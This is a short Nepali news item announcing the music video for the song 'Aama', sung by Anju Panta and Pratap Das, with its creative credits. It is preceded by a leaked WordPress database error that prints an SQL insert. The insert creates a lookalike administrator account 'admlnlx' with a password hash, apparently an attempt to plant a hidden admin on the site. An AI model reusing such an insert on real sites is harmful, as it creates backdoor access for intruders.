WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsSXUwapRdmgbfDO0sVYOyXJNr8NfM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 07:12:37', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । अन्जु पन्त र प्रताब दासको स्वरमा रहेको “आमा” गीतको म्यूजिक भिडियो सार्वजनिक भएको छ ।
सुदन खत्रिको शब्द, एलेन मगरको संगीत र बिष्णु निरौलाको संगीत संयोजन रहेको आमामा चर्चित मोडल जिम्बे राई, रषि्म भटराई र मदन थापाले अभिनय गरेका छन् ।
रनभ इन्टरटेनमेन्ट युटुबबाट सार्वजनिक गरिएको भिडियोमा राहुल बराईलिको निर्देशन, उत्तम हुमागाईको छयाँङकन र मिलन बिश्वकर्माको संपादन रहेको छ ।